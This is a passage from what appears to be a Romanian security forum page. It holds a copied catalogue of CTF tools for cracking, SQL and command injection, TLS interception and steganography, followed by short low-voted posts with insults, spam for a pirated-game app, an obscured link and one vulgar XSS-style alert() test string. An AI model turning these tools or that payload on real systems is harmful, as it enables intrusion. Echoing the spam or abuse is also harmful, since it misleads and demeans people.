Cross-architecture decompiler. binary taintgrind A valgrind taint analysis tool. binary villoc Visualization of heap operations. binary virtualsocket A nice library to interact with binaries. binary wcc The Witchcraft Compiler Collection is a collection of compilation tools to perform binary black magic on the GNU/Linux and other POSIX platforms. binary xrop Gadget finder. forensics binwalk Firmware (and arbitrary file) analysis tool. forensics dislocker Tool for reading Bitlocker encrypted partitions. forensics exetractor Unpacker for packed Python executables. Supports PyInstaller and py2exe. forensics firmware-mod-kit Tools for firmware packing/unpacking. forensics pdf-parser Tool for digging in PDF files forensics peepdf Powerful Python tool to analyze PDF documents. forensics scrdec A decoder for encoded Windows Scripts. forensics testdisk Testdisk and photorec for file recovery. crypto cribdrag Interactive crib dragging tool (for crypto). crypto foresight A tool for predicting the output of random number generators. To run, launch "foresee". crypto featherduster An automated, modular cryptanalysis tool. crypto hashkill Hash cracker. crypto hashpump A tool for performing hash length extension attaacks. crypto hashpump-partialhash Hashpump, supporting partially-unknown hashes. crypto hash-identifier Simple hash algorithm identifier. crypto littleblackbox Database of private SSL/SSH keys for embedded devices. crypto msieve Msieve is a C library implementing a suite of algorithms to factor large integers. crypto pemcrack SSL PEM file cracker. crypto pkcrack PkZip encryption cracker. crypto python-paddingoracle Padding oracle attack automation. crypto reveng CRC finder. crypto ssh_decoder A tool for decoding ssh traffic. You will need ruby1.8 from https://launchpad.net/~brightbox/+archive/ubuntu/ruby-ng to run this. Run with ssh_decoder --help for help, as running it with no arguments causes it to crash. crypto sslsplit SSL/TLS MITM. crypto xortool XOR analysis tool. crypto yafu Automated integer factorization. web burpsuite Web proxy to do naughty web stuff. web commix Command injection and exploitation tool. web dirb Web path scanner. web dirsearch Web path scanner. web mitmproxy CLI Web proxy and python library. web sqlmap SQL injection automation engine. web subbrute A DNS meta-query spider that enumerates DNS records, and subdomains. stego sound-visualizer Audio file visualization. stego steganabara Another image steganography solver. stego stegdetect Steganography detection/breaking tool. stego stegsolve Image steganography solver. stego zsteg detect stegano-hidden data in PNG & BMP. android apktool Dissect, dis-assemble, and re-pack Android APKs android android-sdk The android SDK (adb, emulator, etc). misc z3 Theorem prover from Microsoft Research. misc jdgui Java decompiler. misc veles Binary data analysis and visulalization tool. Sursa: https://github.com/zardus/ctf-tools
  35. 1 point
  36. 0 points
    Esti un terminat daca dupa ce ti-am dat downvote ai inceput sa creezi conturi sa imi dai downvote. Fa ceva cu viata ta
  37. 0 points
    Aha, si package-lock.json ce face? Puneti ba mana si invatati ce fac tool-urile pe care le folositi. Voi chiar puteti sa fiti multumiti de voi in halul asta?
  38. -1 points
    Nu mai bine iti vezi tu de viata si te opresti in a-ti share-ui ideile ?
  39. -1 points
  40. -1 points
    < .I. > "<stim ca/ma-ta-i grasa=alert('testingboss suge pula')>"
  41. -1 points
    Pentru ce jignirile?
  42. -1 points
    Dar mai pe scurt package.json ofera o varianta ez de a "urmări" pachetele care sunt utilizate în aplicație/program. " { "main": "index.js", "dependencies": { "socket.io-client": "2.1.1", "chalk": "2.4.1", "prompts": "1.2.0" } } " wow
  43. -1 points
    Hello, the MSM8974 is also known as the Qualcomm Snapdragon 800, pretty old SoC, but I made a tutorial for the exploit a while back, check it out: http://bit.do/e8GFr
  44. -2 points
    de ce a traversat gaina strada ?
  45. -2 points
  46. -2 points
    Download GTA 5 APK Mobile game on TutuApp now. It is already on Tutuapp 2019. Everyone, install it now.
  47. -3 points
    Hacker adevarat
×
×
  • Create New...